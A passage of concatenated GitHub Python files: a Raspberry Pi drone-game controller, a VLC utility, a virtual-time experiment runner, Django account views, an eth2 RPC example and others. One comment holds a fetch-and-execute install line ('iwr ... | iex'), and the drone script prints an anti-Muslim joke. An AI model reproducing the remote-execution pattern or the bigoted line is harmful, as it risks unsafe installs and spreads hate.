g.OUT)\ng.output(BUTTONLIGHT, 1)\ng.output(RADIORELAY, 1)\n\nfor j in range(4):\n g.setup(COL[j], g.OUT)\n g.output(COL[j], 1)\n\nfor i in range(4):\n g.setup(ROW[i], g.IN, pull_up_down=g.PUD_UP)\n\nm.init()\nm.music.load(\"sixniner.mp3\")\n\n\ndef osc_set_reset(address):\n m = OSC.OSCMessage()\n m.setAddress(address)\n m.append(1)\n c.send(m)\n time.sleep(1)\n m = OSC.OSCMessage()\n m.setAddress(address)\n m.append(0)\n c.send(m)\n\n\ndef check(str):\n print('checking: {}'.format(str))\n if len(str) >= len(CODE):\n # print('greater: {}, {}'.format(str[-4:-1], CODE))\n if str[-len(CODE):] == CODE:\n print(\"you did the code!\")\n osc_set_reset('/droneGame/push4')\n return True\n\n\n\ndef keypad(gameState):\n foo = ''\n while (gameState == gamePosition):\n for j in range(4):\n g.output(COL[j], 0)\n\n for i in range(4):\n if g.input(ROW[i]) == 0:\n print(MATRIX[i][j])\n if MATRIX[i][j] == 0:\n print(\"ZERO!\")\n if check(foo):\n gameState = gamePositionList[gamePositionList.index(gameState) + 1]\n foo += str((MATRIX[i][j]))\n while(g.input(ROW[i]) == 0):\n pass\n g.output(COL[j], 1)\n\ndef switch_test(inputNum, gameState):\n state = ''\n newstate = state\n while (gameState == gamePosition):\n if g.input(inputNum) == 0:\n newstate = gameState+'_on'\n if state != newstate:\n state = newstate\n print('state change: {}'.format(state))\n gameState = 'X'\n else:\n newstate = gameState+'_off'\n if state != newstate:\n state = newstate\n print('state change: {}'.format(state))\n\n\nclass BlinkHandler(object):\n def __init__(self, section):\n pin_dict = {'power': {'green': 5, 'red': 3, 'status': 'off'},\n 'key': {'green': 24, 'red': 23, 'status': 'off'},\n 'numpad': {'green': 32, 'red': 31, 'status': 'off'},\n 'button': {'green': 36, 'red': 35, 'status': 'off'}}\n self.ledIndicator = pin_dict[section]\n self.procs = []\n self.event = mp.Event()\n for pin in (self.ledIndicator['green'], self.ledIndicator['red']):\n g.setup(pin, g.OUT)\n g.output(pin, 1)\n\n\n\n def _redBlink(self, blinkPin):\n while not self.event.is_set():\n g.output(blinkPin, 0)\n time.sleep(.25)\n g.output(blinkPin, 1)\n time.sleep(.25)\n\n def _soldGreen(self, blinkPin):\n g.output(blinkPin, 0)\n\n def _off(self, blinkPin):\n g.output(blinkPin, 1)\n\n def updatePreviousState(self):\n if self.ledIndicator['status'] == 'green':\n self._off(self.ledIndicator['green'])\n elif self.ledIndicator['status'] == 'red':\n self.event.set()\n for p in self.procs:\n p.join()\n self.event.clear()\n\n def changeState(self, state):\n self.updatePreviousState()\n if state == 'green':\n self._soldGreen(self.ledIndicator['green'])\n self.ledIndicator['status'] = 'green'\n elif state == 'red':\n x = mp.Process(target=(self._redBlink), args=(self.ledIndicator['red'],))\n x.start()\n self.procs.append(x)\n self.ledIndicator['status'] = 'red'\n elif state == 'off':\n self.event.set()\n for p in self.procs:\n p.join()\n self.event.clear()\n self._off(self.ledIndicator['red'])\n self._off(self.ledIndicator['green'])\n\n# end blinkHandler\n\n\nfoo = ''\nstate = ''\nnewState = state\npstate = ''\nnewPstate = pstate\ngamePositionList = ['start', 'powerCabled', 'keyInserted', 'radioCalled',\n 'keypadEntered', 'buttonPushed']\ngamePosition = gamePositionList[0]\n\n\npowerLed = BlinkHandler('power')\nkeyLed = BlinkHandler('key')\nnumLed = BlinkHandler('numpad')\nbuttonLed = BlinkHandler('button')\n\n\n\n### server ###\nserver = OSCServer( (\"0.0.0.0\", 8888) )\nserver.timeout = 0\n\n\ndef handle_timeout(self):\n self.timed_out = True\n\ndef cb(path, tags, args, source):\n if args[0] == 1:\n gamePosition = 'start'\n print('game position is now start!')\n try:\n powerLed.changeState('off')\n keyLed.changeState('off')\n numLed.changeState('off')\n buttonLed.changeState('off')\n print(\"reset game postion: {}\".format(gamePosition))\n except Exception as e:\n print('that didna work')\n print(e)\n print(path, tags, args, source)\n\ndef nothing(*args):\n pass\n\nserver.addMsgHandler(\"/yes/please\", cb)\nserver.addMsgHandler(\"/yes/no\", nothing)\n\ndef each_frame():\n server.timed_out = False\n while not server.timed_out:\n server.handle_request()\n\n\ndef run():\n sleep(1)\n each_frame()\n\nt = mp.Process(target=run, args=())\nt.start()\n\n### end server\n\n\ntry:\n while True:\n\n if gamePosition == 'start':\n print('hello I am start')\n # powerLed = BlinkHandler('power')\n powerLed.changeState('red')\n switch_test(POWER, gamePosition)\n powerLed.changeState('green')\n osc_set_reset('/droneGame/push2')\n gamePosition = gamePositionList[1]\n print('foo: {}'.format(gamePosition))\n elif gamePosition == 'powerCabled':\n # keyLed = BlinkHandler('key')\n keyLed.changeState('red')\n switch_test(LOCK, gamePosition)\n keyLed.changeState('green')\n osc_set_reset('/droneGame/push3')\n gamePosition = gamePositionList[2]\n elif gamePosition == 'keyInserted':\n # numLed = BlinkHandler('numpad')\n numLed.changeState('red')\n print(\"radio?\")\n g.output(RADIORELAY, 0)\n m.music.play(loops=-1)\n keypad(gamePosition)\n numLed.changeState('green')\n m.music.stop()\n g.output(RADIORELAY, 1)\n print('and then???')\n gamePosition = 'keypadEntered'\n\n ### deal with radio here\n\n elif gamePosition == 'keypadEntered':\n # buttonLed = BlinkHandler('button')\n buttonLed.changeState('red')\n g.output(BUTTONLIGHT, 0)\n print(\"Button status: {}\".format(g.input(BUTTON)))\n switch_test(BUTTON, gamePosition)\n print(\"buttoned?\")\n buttonLed.changeState('green')\n g.output(BUTTONLIGHT, 1)\n osc_set_reset('/droneGame/push5')\n gamePosition = 'XXX'\n print('missle launched muslims destroyed\\ncongratulations you are racist!!')\n\nexcept KeyboardInterrupt as e:\n osc_set_reset('/4toggles/push8')\n print(\"fml: {}\".format(e))\n g.cleanup()\n","repo_name":"jerkmuffin/AmazonDroneFiles","sub_path":"droneMachine.py","file_name":"droneMachine.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38934644185","text":"from letmedoit import config\nimport os, sys, re, platform, subprocess\nfrom letmedoit.utils.shared_utils import SharedUtil\n\nclass VlcUtil:\n\n macVlc = windowsVlc = \"\"\n\n @staticmethod\n def isVlcPlayerInstalled():\n # on macOS\n macVlc = \"/Applications/VLC.app/Contents/MacOS/VLC\"\n VlcUtil.macVlc = macVlc if platform.system() == \"Darwin\" and os.path.isfile(macVlc) else \"\"\n # on Windows\n windowsVlc = r'C:\\Program Files\\VideoLAN\\VLC\\vlc.exe'\n if platform.system() == \"Windows\":\n if os.path.isfile(windowsVlc):\n VlcUtil.windowsVlc = windowsVlc\n elif SharedUtil.isPackageInstalled(\"vlc\"):\n # Windows users can install vlc command with scoop\n # read: https://github.com/ScoopInstaller/Scoop\n # instll scoop\n # > iwr -useb get.scoop.sh | iex\n # > scoop install aria2\n # install vlc\n # > scoop bucket add extras\n # > scoop install vlc\n VlcUtil.windowsVlc = \"vlc\"\n else:\n VlcUtil.windowsVlc = \"\"\n if (VlcUtil.macVlc or VlcUtil.windowsVlc or SharedUtil.isPackageInstalled(\"vlc\")):\n return True\n else:\n return False\n\n @staticmethod\n def openVlcPlayer():\n def run(command):\n os.system(\"{0}{1} > /dev/null 2>&1 &\".format(\"nohup \" if SharedUtil.isPackageInstalled(\"nohup\") else \"\", command))\n VlcUtil.closeVlcPlayer()\n try:\n if VlcUtil.windowsVlc:\n os.system(VlcUtil.windowsVlc)\n elif VlcUtil.macVlc:\n run(VlcUtil.macVlc)\n elif SharedUtil.isPackageInstalled(\"vlc\"):\n run(\"vlc\")\n except:\n print(\"No VLC player is found!\")\n\n @staticmethod\n def closeVlcPlayer():\n try:\n if platform.system() == \"Windows\":\n os.system(\"taskkill /IM vlc.exe /F\")\n else:\n os.system(\"pkill VLC\")\n os.system(\"pkill vlc\")\n except:\n pass\n\n @staticmethod\n def playMediaFile(filePath, vlcSpeed=None, audioGui=False):\n if vlcSpeed is None:\n vlcSpeed = config.vlcSpeed\n # get full path and escape double quote\n if isinstance(filePath, str):\n filePath = os.path.abspath(filePath).replace('\"', '\\\\\"')\n else:\n # when filePath is a list\n filePath = [os.path.abspath(i).replace('\"', '\\\\\"') for i in filePath]\n filePath = '\" \"'.join(filePath)\n VlcUtil.playMediaFileVlcGui(filePath, vlcSpeed) if re.search(\"(.mp4|.avi)$\", filePath.lower()[-4:]) or audioGui else VlcUtil.playMediaFileVlcNoGui(filePath, vlcSpeed)\n\n # play audio file with vlc without gui\n @staticmethod\n def playMediaFileVlcNoGui(filePath, vlcSpeed=None):\n if vlcSpeed is None:\n vlcSpeed = config.vlcSpeed\n # vlc on macOS\n if VlcUtil.macVlc:\n command = f'''{VlcUtil.macVlc} --intf rc --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # vlc on windows\n elif VlcUtil.windowsVlc:\n command = f'''\"{VlcUtil.windowsVlc}\" --intf dummy --play-and-exit --rate {vlcSpeed} \"{filePath}\"'''\n # vlc on other platforms\n elif SharedUtil.isPackageInstalled(\"cvlc\"):\n command = f'''cvlc --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # use .communicate() to wait for the playback to be completed as .wait() or checking pid existence does not work\n subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n\n\n # play video file with vlc with gui\n @staticmethod\n def playMediaFileVlcGui(filePath, vlcSpeed):\n # vlc on macOS\n if VlcUtil.macVlc:\n command = f'''{VlcUtil.macVlc} --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # vlc on windows\n elif VlcUtil.windowsVlc:\n command = f'''\"{VlcUtil.windowsVlc}\" --play-and-exit --rate {vlcSpeed} \"{filePath}\"'''\n # vlc on other platforms\n elif SharedUtil.isPackageInstalled(\"vlc\"):\n command = f'''vlc --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # use .communicate() to wait for the playback to be completed as .wait() or checking pid existence does not work\n subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n\nif __name__ == '__main__':\n speed = float(sys.argv[1])\n audioFile = \" \".join(sys.argv[2:])\n VlcUtil.playMediaFile(audioFile, speed)\n isVlcPlaying = os.path.join(\"temp\", \"isVlcPlaying\")\n if os.path.isfile(isVlcPlaying):\n os.remove(isVlcPlaying)\n\n","repo_name":"eliranwong/myhand","sub_path":"package/letmedoit/utils/vlc_utils.py","file_name":"vlc_utils.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"36657712595","text":"# APP-VT is an experimental feature which would use Intel-PIN-TOOL for instruction counting.\n# This example script shows how such an experiment can be started. NOTE how /usr/bin/app_vt_tracer\n# is used to start the binaries instead of /usr/bin/tracer. This is the only difference.\n\nimport sys\nimport os\nimport time\nimport kronos_functions as kf\nimport sys\nimport argparse\n\n\ndef start_new_dilated_process(total_num_tracers, cmd_to_run, log_file_fd, rel_cpu_speed):\n newpid = os.fork()\n if newpid == 0:\n os.dup2(log_file_fd, sys.stdout.fileno())\n os.dup2(log_file_fd, sys.stderr.fileno())\n args = [\"/usr/bin/app_vt_tracer\", \"-n\", str(total_num_tracers), \"-c\", cmd_to_run, \"-r\", str(rel_cpu_speed)]\n os.execvp(args[0], args)\n else:\n return newpid\n\n\ndef main():\n\n \n parser = argparse.ArgumentParser()\n\n\n parser.add_argument('--cmds_to_run_file', dest='cmds_to_run_file',\n help='path to file containing commands to run', \\\n type=str, default='cmds_to_run_file.txt')\n\n\n parser.add_argument('--num_insns_per_round', dest='num_insns_per_round',\n help='Number of insns per round', type=int,\n default=1000000)\n\n parser.add_argument('--num_progress_rounds', dest='num_progress_rounds',\n help='Number of rounds to run', type=int,\n default=2000)\n\n parser.add_argument('--rel_cpu_speed', dest='rel_cpu_speed',\n help='relative cpu speed', type=float, \\\n default=1.0)\n\n args = parser.parse_args()\n log_fds = []\n tracer_pids = []\n cmds_to_run = []\n\n\n if not os.path.isfile(args.cmds_to_run_file):\n print (\"Commands file path is incorrect !\")\n sys.exit(0)\n fd1 = open(args.cmds_to_run_file, \"r\")\n cmds_to_run = [x.strip() for x in fd1.readlines()]\n fd1.close()\n for i in range(0, len(cmds_to_run)) :\n with open(\"/tmp/tracer_log%d.txt\" %(i), \"w\") as f:\n pass\n log_fds = [ os.open(\"/tmp/tracer_log%d.txt\" %(i), os.O_RDWR | os.O_CREAT ) \\\n for i in range(0, len(cmds_to_run)) ]\n num_tracers = len(cmds_to_run)\n\n input('Press any key to continue !')\n for i in range(0, num_tracers) :\n with open(\"/tmp/tracer_log%d.txt\" %(i), \"w\") as f:\n pass\n log_fds = [ os.open(\"/tmp/tracer_log%d.txt\" %(i), os.O_RDWR | os.O_CREAT ) \\\n for i in range(0, num_tracers) ]\n\n print (\"Initializing VT Module !\" ) \n if kf.initializeExp(num_tracers) < 0 :\n print (\"VT module initialization failed ! Make sure you are running \"\n \"the dilated kernel and kronos module is loaded !\")\n sys.exit(0)\n\n input('Press any key to continue !')\n \n print (\"Starting all commands to run !\")\n \n for i in range(0, num_tracers):\n print (\"Starting tracer: %d\" %(i + 1))\n start_new_dilated_process(num_tracers, cmds_to_run[i], log_fds[i], args.rel_cpu_speed)\n \n print (\"Synchronizing anf freezing tracers ...\")\n while kf.synchronizeAndFreeze() <= 0:\n print (\"VT Module >> Synchronize and Freeze failed. Retrying in 1 sec\")\n time.sleep(1)\n\n input('Press any key to continue !')\n print (\"Starting Synchronized Experiment !\")\n start_time = float(time.time())\n if args.num_progress_rounds > 0 :\n print (\"Running for %d rounds ... \" %(args.num_progress_rounds))\n num_finised_rounds = 0\n step_size = min(10, args.num_progress_rounds)\n while num_finised_rounds < args.num_progress_rounds:\n kf.progressBy(args.num_insns_per_round, step_size)\n num_finised_rounds += step_size\n #input(\"Press Enter to continue...\")\n print (\"Ran %d rounds ...\" %(num_finised_rounds),\n \" elapsed time ...\", float(time.time()) - start_time)\n\n elapsed_time = float(time.time()) - start_time\n print (\"Total time elapsed (secs) = \", elapsed_time)\n input(\"Press Enter to continue...\")\n print (\"Stopping Synchronized Experiment !\")\n kf.stopExp()\n\n for fd in log_fds:\n os.close(fd)\n\n print(\"Finished ! Logs of each ith tracer can be found in /tmp/tracer_logi.txt\")\n \n \n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Vignesh2208/Kronos","sub_path":"examples/example_app_vt_experiment.py","file_name":"example_app_vt_experiment.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"4799633571","text":"from argparse import ArgumentParser\nimport logging\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\nbeauty_targets = [\n 'Benefits', 'Brand',\n 'Colour_group', 'Product_texture',\n 'Skin_type']\n\nfashion_targets = [\n 'Pattern', 'Collar Type',\n 'Fashion Trend', 'Clothing Material',\n 'Sleeves']\n\nmobile_targets = [\n 'Operating System', 'Features',\n 'Network Connections', 'Memory RAM',\n 'Brand', 'Warranty Period',\n 'Storage Capacity', 'Color Family',\n 'Phone Model', 'Camera', 'Phone Screen Size']\n\n\ndef main():\n parser = ArgumentParser(description='Combine predictions.')\n parser.add_argument('-f', '--files', type=str, nargs='+', metavar='', required=True, help='List of prediction file pathsargparse.FileType('r'), nargs='+',.')\n parser.add_argument('--seed', type=int, default=0, help='Random seed.')\n A = parser.parse_args()\n\n log_level = 'DEBUG'\n log_format = '%(asctime)-15s [%(name)s-%(process)d] %(levelname)s: %(message)s'\n logging.basicConfig(format=log_format, level=logging.getLevelName(log_level))\n\n out_df = pd.DataFrame(columns=['id', 'tagging'])\n for f in A.files:\n logger.info('Starting with {}....'.format(f))\n if 'beauty' in f:\n targets = beauty_targets\n elif 'fashion' in f:\n targets = fashion_targets\n elif 'mobile' in f:\n targets = mobile_targets\n #end if\n\n df = pd.read_csv(f)\n\n count = 0\n tmp_df = pd.DataFrame(columns=['id', 'tagging'])\n id_list = list()\n tagging_list = list()\n for i, row in df.iterrows():\n _id = str(row['itemid'])\n for target in targets:\n id_list.append(_id + '_' + target)\n tagging_list.append(row[target])\n #end for\n\n count += 1\n if count % 1000 == 0:\n logger.info('Hang on.... Has processed {} rows of data....'.format(count))\n #end for\n tmp_df['id'] = pd.Series(id_list)\n tmp_df['tagging'] = pd.Series(tagging_list)\n\n out_df = pd.concat([out_df, tmp_df])\n\n logger.info('Done with {}....'.format(f))\n #end for\n\n out_df.to_csv('./data/submission.csv', index=False)\n#end def\n\nif __name__ == '__main__': main()\n","repo_name":"wayneczw/nanyang-code-farmer","sub_path":"combine_pred.py","file_name":"combine_pred.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38664382574","text":"\"\"\"\nA simple script to automate code cleanups.\nDid not copy majority from PygameCommunityBot again\n\"\"\"\n\nfrom __future__ import annotations\n\nimport glob\nimport os\nimport pathlib\nimport subprocess\nimport sys\n\ntry:\n import black\nexcept ImportError:\n print(\"We use black to format code. Please install it with 'pip install black'\")\n raise SystemExit\n\ntry:\n import isort\nexcept ImportError:\n print(\"We use isort to format code. Please install it with 'pip install isort'\")\n raise SystemExit\n\nHEADER_TEXT = '''\"\"\"\nThis file is a part of the source code for rpg-tile-game\nThis project has been licensed under the MIT license.\nCopyright (c) 2022-present SSS-Says-Snek\n'''\n\n\nclass DummyPrinter:\n def success(self, msg):\n pass\n\n def error(self, msg):\n pass\n\n def diff_line(self, line):\n pass\n\n\ndef check_header_string():\n added_header = False\n for filepath in glob.iglob(\"**/*.py\", recursive=True):\n file = pathlib.Path(os.getcwd(), filepath)\n file_data = file.read_text().lstrip()\n if file_data.startswith(HEADER_TEXT):\n continue\n\n if not file_data.startswith('\"\"\"'):\n added_header = True\n file.write_text(f'{HEADER_TEXT}\"\"\"\\n\\n{file_data}')\n print(\"Added header:\", filepath)\n\n if not added_header:\n print(\"No files without headers!\")\n\n\ndef check_imports():\n reorganized_imports = False\n isort.api.create_terminal_printer = lambda *args, **kwargs: DummyPrinter()\n\n for filepath in glob.iglob(\"**/*.py\", recursive=True):\n file = pathlib.Path(os.getcwd(), filepath)\n if isort.file(file):\n reorganized_imports = True\n print(\"Reorganized import:\", filepath)\n\n if not reorganized_imports:\n print(\"No imports in need of reorganizing!\")\n\n\ndef cleanup_code():\n \"\"\"\n Clean up all files of a given extension under a directory\n \"\"\"\n for filepath in glob.iglob(\"**/*.py\", recursive=True):\n path = pathlib.Path(os.getcwd(), filepath)\n if black.format_file_in_place(path, False, black.FileMode(line_length=119), black.WriteBack.YES):\n print(\"Formatted file:\", filepath)\n else:\n print(f\"Skipping file {filepath} as it is already formatted\")\n\n print(\"\\n====================== Adding headers ======================\")\n check_header_string()\n\n print(\"\\n====================== Reorganizing imports ======================\")\n subprocess.run([sys.executable, \"-m\", \"isort\", \".\"])\n\n print(\"\\n====================== Adding future imports ======================\")\n subprocess.run(\n [sys.executable, \"-m\", \"isort\", \".\", \"--add-import\", \"from __future__ import annotations\"],\n stdout=subprocess.DEVNULL,\n )\n print(\"Done!\")\n\n # What is going on\n # print(\"\\n====================== Reorganizing imports ======================\")\n # check_imports()\n\n\nif __name__ == \"__main__\":\n cleanup_code()\n","repo_name":"SSS-Says-Snek/rpg-tile-game","sub_path":"cleancode.py","file_name":"cleancode.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"69864105098","text":"#!/usr/bin/env python3\n\nwith open(\"input.txt\") as fh:\n x_max = 0\n y_max = 0\n lines = []\n\n ## parse the input file and find max dimentions.\n for l in fh:\n (fro, to) = l.split(\"->\")\n fro = fro.strip().split(\",\")\n to = to.strip().split(\",\")\n\n lines.append((fro,to))\n\n l = [int(fro[0]), int(to[0]), x_max]\n x_max = max(l)\n y_max = max([int(fro[1]), int(to[1]), y_max])\n\n x_max += 1\n y_max += 1\n\n board = [ [0]*x_max for x in range(y_max) ]\n\n ## Now draw the lines onto the board.\n for line in lines:\n (fro, to) = line\n\n fro = list(map(lambda x: int(x), fro))\n to = list(map(lambda x: int(x), to))\n\n (xFrom, xTo ) = (fro[0], to[0]) if fro[0] < to[0] else (to[0], fro[0])\n (yFrom, yTo ) = (fro[1], to[1]) if fro[1] < to[1] else (to[1], fro[1])\n\n assert(xFrom <= xTo)\n assert(yFrom <= yTo)\n\n ## handle the easy case\n if ( xFrom == xTo or yFrom == yTo ):\n for y in range(yFrom, yTo+1):\n for x in range(xFrom, xTo+1):\n board[y][x] += 1\n else:\n dX = fro[0] - to[0]\n dY = fro[1] - to[1]\n\n assert(abs(dX) == abs(dY))\n steps = abs(dX) + 1\n x_dir = -1 if dX < 0 else 1\n y_dir = -1 if dY < 0 else 1\n\n tX = to[0]\n tY = to[1]\n\n for i in range(steps):\n board[tY][tX] +=1\n tX += x_dir\n tY += y_dir\n\n\n total = 0\n\n## Print the board here.\n# for y in range(y_max):\n# for x in range(x_max):\n# print(board[y][x], \"\", end=\"\")\n# if board[y][x] >= 2:\n# total += 1\n# print()\n#\n print(total)\n","repo_name":"langly/adventofcode","sub_path":"2021/day5/day5_1.py","file_name":"day5_1.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25153763357","text":"from django.shortcuts import render\r\n\r\nfrom rest_framework import status\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.authtoken.models import Token\r\nfrom rest_framework.decorators import api_view, permission_classes\r\nfrom rest_framework.permissions import AllowAny, IsAdminUser, IsAuthenticated\r\n\r\nfrom account.models import Account\r\nfrom account.serializers import AccountSerializer\r\n\r\n# Create your views here.\r\n@api_view(['GET'])\r\n@permission_classes([AllowAny])\r\ndef accountTest(request):\r\n accounts = Account.objects.all()\r\n serializer = AccountSerializer(accounts, many = True)\r\n data = serializer.data\r\n return Response(data, status = status.HTTP_200_OK)\r\n\r\n@api_view(['POST'])\r\n@permission_classes([AllowAny])\r\ndef accountRegister(request):\r\n response = {}\r\n serializer = AccountSerializer(data = request.data)\r\n if serializer.is_valid():\r\n account = serializer.save()\r\n token = Token.objects.get(user = account).key\r\n response['email'] = account.email\r\n response['username'] = account.username\r\n response['token'] = token\r\n response['status'] = 'Account Successfully Created!'\r\n return Response(response, status = status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET', 'PATCH'])\r\n@permission_classes([IsAdminUser|IsAuthenticated])\r\ndef accountProfile(request, role, email):\r\n try:\r\n account = Account.objects.get(email = email)\r\n except Account.DoesNotExist:\r\n message = {'error': 'Sorry, seems there\\'s a problem with your email'}\r\n return Response(message, status = status.HTTP_404_NOT_FOUND)\r\n \r\n if not request.user.is_staff and account != request.user:\r\n message = {'error': 'Sorry, you\\'re prohibited in this area'}\r\n return Response(message, status = status.HTTP_403_FORBIDDEN)\r\n\r\n if account.role != role:\r\n message = {'error': 'Sorry, seems there\\'s a problem with the slug that relate to the email or role'}\r\n return Response(message, status = status.HTTP_400_BAD_REQUEST)\r\n \r\n if request.method == 'GET':\r\n serializer = None\r\n data = None\r\n\r\n if account.role == 'buyer':\r\n serializer = AccountSerializer(account, many = False, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'nomorInduk', 'angkatan', 'jurusan'\r\n ))\r\n data = serializer.data\r\n data['password'] = '*******'\r\n elif account.role == 'seller':\r\n serializer = AccountSerializer(account, many = False, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'namaPanggilan', 'nomorHP', 'namaToko', 'tipeDagangan'\r\n ))\r\n data = serializer.data\r\n data['password'] = '*******'\r\n\r\n return Response(data, status = status.HTTP_200_OK)\r\n elif request.method == 'PATCH':\r\n \r\n serializer = None\r\n if account.role == 'buyer':\r\n serializer = AccountSerializer(account, data = request.data, partial = True, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'nomorInduk', 'angkatan', 'jurusan', 'password', 'passwordConfirmation'\r\n ))\r\n elif account.role == 'seller':\r\n serializer = AccountSerializer(account, data = request.data, partial = True, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'namaPanggilan', 'nomorHP', 'namaToko', 'tipeDagangan'\r\n ))\r\n\r\n if serializer.is_valid():\r\n serializer.update(account.email)\r\n return Response(serializer.data, status = status.HTTP_202_ACCEPTED)\r\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)","repo_name":"faisaladisoe/Magerbun-Auth","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"33286389250","text":"import trio\nimport os\nimport io\nfrom typing import Coroutine, Callable\n\nfrom pyrum import Rumor, SubprocessConn\n\n\n# Before importing spec, load config:\n# from eth2spec.config.config_util import prepare_config\n# prepare_config(\"./some-dir\", \"config-name\")\n\nfrom eth2spec.phase0.spec import *\n\n\nclass Status(Container):\n version: Bytes4\n finalized_root: Bytes32\n finalized_epoch: uint64\n head_root: Bytes32\n head_slot: uint64\n\n\nclass Goodbye(uint64):\n pass\n\n\nclass BlocksByRange(Container):\n head_block_root: Bytes32\n start_slot: uint64\n count: uint64\n step: uint64\n\n\nclass BlocksByRoot(List[SignedBeaconBlock, 1024]):\n pass\n\n\ndef load_state(filepath: str) -> BeaconState:\n state_size = os.stat(filepath).st_size\n with io.open(filepath, 'br') as f:\n return BeaconState.deserialize(f, state_size)\n\n\nasync def basic_status_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Load some genesis state of the client (or use make_genesis.py)\n state = load_state('genesis.ssz')\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n print(\"Testing a Status RPC request\")\n\n head = state.latest_block_header.copy()\n head.state_root = state.hash_tree_root()\n\n # Sync status\n morty_status = Status(\n version=compute_fork_digest(state.fork.current_version, state.genesis_validators_root),\n finalized_root=state.finalized_checkpoint.root,\n finalized_epoch=0,\n head_root=head.hash_tree_root(),\n head_epoch=0,\n )\n\n req = morty_status.encode_bytes().hex()\n print(f\"morty: sending rick a status request: {req}\")\n\n # Note: public testnet node is not updated, only receiving an empty response if snappy is enabled.\n resp = await morty.rpc.status.req.raw(rick_peer_id, req, raw=True)\n\n print(f\"morty: received status response from rick: {resp}\")\n try:\n rick_status = Status.decode_bytes(bytes.fromhex(resp['chunk']['data']))\n print(rick_status)\n except Exception as e:\n print(f\"could not decode status response: {e}\")\n\n call = morty.rpc.status.listen(raw=True, compression='snappy')\n # Other keywords to try here:\n # Req-resp timeout: timeout=123000 (in milliseconds, 0 to disable)\n # Drop contents, not keeping track of them to reply later: drop=True\n # Ignore request bytes, do not read any: read=False\n\n async def process_requests():\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n # Respond with Input error\n # await morty.rpc.status.resp.invalid_request(req['req_id'], f\"hello! Morty does not like your request!\")\n\n # Respond with server error\n # await morty.rpc.status.resp.server_error(req['req_id'], f\"hello! Morty failed, look for a new morty!\")\n\n # Respond with valid chunk (and done=True to exit immediately after)\n resp = morty_status.encode_bytes().hex()\n await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, done=True)\n\n # Or send arbitrary data\n # resp = bytes.fromhex('1337')\n # await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, result_code=2, done=True)\n\n print(\"morty: stopped listening for requests\")\n\n print(\"listening for requests\")\n await process_requests()\n\n # Or start listening in the background:\n # nursery.start_soon(process_requests)\n # await call.started() # wait for the stream handler to come online, there will be a \"started=true\" entry.\n\n\nasync def server_blocks_by_range_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_range.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRange.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n start = parsed_req.start_slot\n end = start + parsed_req.count * parsed_req.step\n\n for i, slot in zip(range(parsed_req.count), range(start, end, parsed_req.step)):\n # Try any message:\n # resp = f\"not a block, but can you decode this chunk though? chunk nr {i} here\".encode()\n # Or construct a block (can make it 